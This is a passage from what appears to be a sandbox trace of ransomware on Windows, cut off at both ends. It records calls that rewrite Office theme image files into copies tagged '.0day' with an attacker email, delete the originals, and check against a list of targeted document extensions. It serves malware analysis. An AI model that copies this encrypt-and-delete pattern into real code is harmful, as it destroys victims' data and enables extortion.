nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.131] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.131] SetEndOfFile (hFile=0x198) returned 1 [0045.131] CloseHandle (hObject=0x198) returned 1 [0045.131] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.131] SetEndOfFile (hFile=0x1d8) returned 1 [0045.132] CloseHandle (hObject=0x1d8) returned 1 [0045.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.132] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0045.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".doc") returned 4 [0045.133] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString=".docx") returned 5 [0045.133] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.133] lstrlenW (lpString=".pdf") returned 4 [0045.133] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString=".xls") returned 4 [0045.133] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.133] lstrlenW (lpString=".xlsx") returned 5 [0045.133] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.133] lstrlenW (lpString=".ppt") returned 4 [0045.133] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".zip") returned 4 [0045.133] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.133] lstrlenW (lpString=".rar") returned 4 [0045.133] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.133] lstrlenW (lpString=".bz2") returned 4 [0045.133] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString=".7z") returned 3 [0045.133] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".dbf") returned 4 [0045.133] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".1cd") returned 4 [0045.133] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".jpg") returned 4 [0045.133] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.133] lstrlenW (lpString=".doc") returned 4 [0045.133] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.133] lstrlenW (lpString=".docx") returned 5 [0045.134] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.134] lstrlenW (lpString=".pdf") returned 4 [0045.134] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.134] lstrlenW (lpString=".xls") returned 4 [0045.134] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.134] lstrlenW (lpString=".xlsx") returned 5 [0045.134] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.134] lstrlenW (lpString=".ppt") returned 4 [0045.134] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.134] lstrlenW (lpString=".zip") returned 4 [0045.134] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.134] lstrlenW (lpString=".rar") returned 4 [0045.134] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.134] lstrlenW (lpString=".bz2") returned 4 [0045.134] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.134] lstrlenW (lpString=".7z") returned 3 [0045.134] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.134] lstrlenW (lpString=".dbf") returned 4 [0045.134] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.134] lstrlenW (lpString=".1cd") returned 4 [0045.134] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.134] lstrlenW (lpString=".jpg") returned 4 [0045.134] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.134] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.134] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.155] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=26402) returned 1 [0045.155] CloseHandle (hObject=0x178) returned 1 [0045.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20 [0045.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0045.254] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.254] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0045.256] GetLastError () returned 0x0 [0045.256] ReadFile (in: hFile=0x17c, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x6722, lpOverlapped=0x0) returned 1 [0045.258] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x6730, lpOverlapped=0x0) returned 1 [0045.259] ReadFile (in: hFile=0x17c, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.259] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.259] SetEndOfFile (hFile=0x170) returned 1 [0045.259] CloseHandle (hObject=0x170) returned 1 [0045.259] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.259] SetEndOfFile (hFile=0x17c) returned 1 [0045.260] CloseHandle (hObject=0x17c) returned 1 [0045.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.261] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.261] lstrlenW (lpString=".doc") returned 4 [0045.261] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".docx") returned 5 [0045.261] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.261] lstrlenW (lpString=".pdf") returned 4 [0045.261] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".xls") returned 4 [0045.261] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".xlsx") returned 5 [0045.261] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.261] lstrlenW (lpString=".ppt") returned 4 [0045.261] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.261] lstrlenW (lpString=".zip") returned 4 [0045.261] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".rar") returned 4 [0045.261] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".bz2") returned 4 [0045.261] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".7z") returned 3 [0045.261] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.261] lstrlenW (lpString=".dbf") returned 4 [0045.261] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.261] lstrlenW (lpString=".1cd") returned 4 [0045.262] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString=".jpg") returned 4 [0045.262] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString=".doc") returned 4 [0045.262] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".docx") returned 5 [0045.262] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.262] lstrlenW (lpString=".pdf") returned 4 [0045.262] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".xls") returned 4 [0045.262] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".xlsx") returned 5 [0045.262] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.262] lstrlenW (lpString=".ppt") returned 4 [0045.262] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString=".zip") returned 4 [0045.262] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".rar") returned 4 [0045.262] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".bz2") returned 4 [0045.262] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".7z") returned 3 [0045.262] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString=".dbf") returned 4 [0045.262] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.262] lstrlenW (lpString=".1cd") returned 4 [0045.262] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0045.263] lstrlenW (lpString=".jpg") returned 4 [0045.263] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.263] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.263] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0045.263] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=5120) returned 1 [0045.263] CloseHandle (hObject=0x17c) returned 1 [0045.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 0x20 [0045.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0045.263] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.263] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0045.267] GetLastError () returned 0x0 [0045.267] ReadFile (in: hFile=0x17c, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1400, lpOverlapped=0x0) returned 1 [0045.269] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0045.270] ReadFile (in: hFile=0x17c, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.270] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.270] SetEndOfFile (hFile=0x170) returned 1 [0045.270] CloseHandle (hObject=0x170) returned 1 [0045.270] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.270] SetEndOfFile (hFile=0x17c) returned 1 [0045.271] CloseHandle (hObject=0x17c) returned 1 [0045.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.271] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1 [0045.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.271] lstrlenW (lpString=".doc") returned 4 [0045.271] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.271] lstrlenW (lpString=".docx") returned 5 [0045.271] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.271] lstrlenW (lpString=".pdf") returned 4 [0045.271] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".xls") returned 4 [0045.272] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".xlsx") returned 5 [0045.272] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.272] lstrlenW (lpString=".ppt") returned 4 [0045.272] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString=".zip") returned 4 [0045.272] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".rar") returned 4 [0045.272] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".bz2") returned 4 [0045.272] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.272] lstrlenW (lpString=".7z") returned 3 [0045.272] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString=".dbf") returned 4 [0045.272] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString=".1cd") returned 4 [0045.272] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString=".jpg") returned 4 [0045.272] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.272] lstrlenW (lpString=".doc") returned 4 [0045.272] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.272] lstrlenW (lpString=".docx") returned 5 [0045.272] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.272] lstrlenW (lpString=".pdf") returned 4 [0045.272] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".xls") returned 4 [0045.272] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.272] lstrlenW (lpString=".xlsx") returned 5 [0045.273] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.273] lstrlenW (lpString=".ppt") returned 4 [0045.273] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.273] lstrlenW (lpString=".zip") returned 4 [0045.273] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.273] lstrlenW (lpString=".rar") returned 4 [0045.273] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.273] lstrlenW (lpString=".bz2") returned 4 [0045.273] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.273] lstrlenW (lpString=".7z") returned 3 [0045.273] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.273] lstrlenW (lpString=".dbf") returned 4 [0045.273] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.273] lstrlenW (lpString=".1cd") returned 4 [0045.273] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.273] lstrlenW (lpString=".jpg") returned 4 [0045.273] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.273] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.273] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.982] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=60724) returned 1 [0045.982] CloseHandle (hObject=0x198) returned 1 [0045.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20 [0045.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.982] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.982] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.982] GetLastError () returned 0x0 [0045.982] ReadFile (in: hFile=0x198, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xed34, lpOverlapped=0x0) returned 1 [0045.985] WriteFile (in: hFile=0x178, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xed40, lpOverlapped=0x0) returned 1 [0045.986] ReadFile (in: 